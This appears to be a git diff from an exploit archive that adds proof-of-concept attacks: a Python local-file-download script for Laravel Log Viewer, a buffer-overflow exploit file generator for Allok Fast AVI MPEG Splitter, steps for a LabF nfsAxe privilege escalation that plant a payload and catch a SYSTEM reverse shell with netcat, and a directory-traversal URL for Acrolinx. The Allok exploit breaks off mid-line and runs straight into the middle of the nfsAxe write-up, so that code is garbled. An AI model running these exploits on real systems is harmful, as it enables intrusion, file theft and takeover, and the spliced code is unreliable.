diff --git a/exploits/php/webapps/44343.py b/exploits/php/webapps/44343.py new file mode 100755 index 000000000..395674fa0 --- /dev/null +++ b/exploits/php/webapps/44343.py @@ -0,0 +1,53 @@ +# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD) +# Date: 23/02/2018 +# Exploit Author: Haboob Team +# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1 +# Version: v0.12.0 and below +# CVE : CVE-2018-8947 + + +1. Description + +Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file. + + +2. Proof of Concept + +#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there + +import os +import base64 +from urllib2 import urlopen, URLError, HTTPError +import argparse +import cookielib +parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_') +parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True) +parser.add_argument("-f", action="store", dest="file", help="Target File", required=True) + +args = parser.parse_args() +url = str(args.url).strip()+"/logs/?dl=" +final_file= args.file +if not os.path.exists("./0Grats0"): + os.makedirs("./0Grats0") + +word = str(args.file).split('/') +word1= "./0Grats0/"+word[-1] +finalee=url+base64.b64encode(final_file) + +try: + f = urlopen(finalee) + with open(word1, "wb") as local_file: + local_file.write(f.read()) +except HTTPError, e: + print "HTTP Error:", e.code, finalee +except URLError, e: + print "URL Error:", e.reason, finalee + + + + + +3. Solution: + +Update to version v0.13.0 +https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0 \ No newline at end of file diff --git a/exploits/windows/local/44341.py b/exploits/windows/local/44341.py new file mode 100755 index 000000000..958e84e01 --- /dev/null +++ b/exploits/windows/local/44341.py @@ -0,0 +1,58 @@ +# SWAMI KARUPASAMI THUNAI +# +############################################################################### +# Exploit Title: Stack Based Buffer Overflow in Allok Fast AVI MPEG Splitter 1.2 (Windows XP SP3) +# Date: 06-03-2018 +# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj +# Organization : TwinTech Solutions +# Vulnerable Software: Allok Fast AVI MPEG Splitter 1.2 +# Vendor Homepage: http://www.alloksoft.com +# Version: 1.2 +# Software Link: http://www.alloksoft.com/allok_vconverter.exe +# Tested On: Windows XP Service Pack 3 (Version 2002) & windows 7 x64 Ultimate +# +# Credit to Velayutham Selvaraj for discovering the Vulnerbility +# Vulnerability Disclosure Date : 2018-03-06 +# +# Manual steps to reproduce the vulnerability ... +#1. Download and install the "setup(allok_fast_avimpegsplitter.exe)" file +#2. Run this exploit code via python 2.7 +#3. A file "exploit.txt" will be created +#4. Copy the contents of the file and paste in the License Name field +# Name > exploit.txt +#5. Type some random character in License Code +#6. Click Register and voila ! +#7. Boom calculator opens +# +############################################################################## +import struct + +file = open("exploit.txt","wb") +buflen = 4000 +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" /var/www/html/xsetsrv.exe + +2. Setup listener and start apache on attacking machine + nc -nlvvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.0.149/xsetsrv.exe and download + +4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe + xsetsrv.exe > xsetsrv.bak + +5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\ + +6. Restart victim machine and login as unprivileged user + +7. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system + +Prerequisites: +To successfully exploit this vulnerability, an attacker must already have access +to a system running a LabF nfsAxe installed at the default location using a +low-privileged user account + +Risk: +The vulnerability allows local attackers to escalate privileges and execute +arbitrary code as Local System aka Game Over. + +Fix: +Don't use default install path \ No newline at end of file diff --git a/exploits/windows/remote/44345.txt b/exploits/windows/remote/44345.txt new file mode 100644 index 000000000..f04c0b9a5 --- /dev/null +++ b/exploits/windows/remote/44345.txt @@ -0,0 +1,15 @@ +# Exploit Title: Acrolinx Dashboard Directory Traversal +# CVE: CVE 2018-7719 +# Date: 19.02.2017 +# Exploit Author: Berk Dusunur +# Vendor Homepage: www.acrolinx.com +# Version:Before 5.2.5 + +PoC + +Acrolinx dashboard windows works on the server. + + +http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini + +http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index de37f582c..64a25b7a0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9616,8 +9616,10 @@ id,file,description,date,author,type,platform,port 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows, 44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux, 44330,exploits/windows/local/44330.py,"Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow",2018-03-23,"Mohan Ravichandran and Velayutham Selvaraj",local,windows, -44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )",2018-03-23,"Juan Sacco",local,linux, +44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)",2018-03-23,"Juan Sacco",local,linux, 44337,exploits/windows/local/44337.py,"Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)",2018-03-23,"Hashim Jawad",local,windows, +44341,exploits/windows/local/44341.py,"Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow",2018-03-26,"Mohan Ravichandran and Velayutham Selvaraj",local,windows, +44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16357,6 +16359,7 @@ id,file,description,date,author,type,platform,port 44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, +44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39039,8 +39042,9 @@ id,file,description,date,author,type,platform,port 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware, 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php, 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple, -44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml, +44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml, 44335,exploits/hardware/webapps/44335.js,"TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery",2018-03-23,"Mans van Someren",webapps,hardware, 44336,exploits/php/webapps/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,webapps,php, 44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php, 44340,exploits/php/webapps/44340.txt,"Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion",2018-03-23,"Nicolas Buzy-Debat",webapps,php,80 +44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index cf3d76202..0b0cbac92 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -872,4 +872,4 @@ id,file,description,date,author,type,platform 42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86 -44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86 +44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86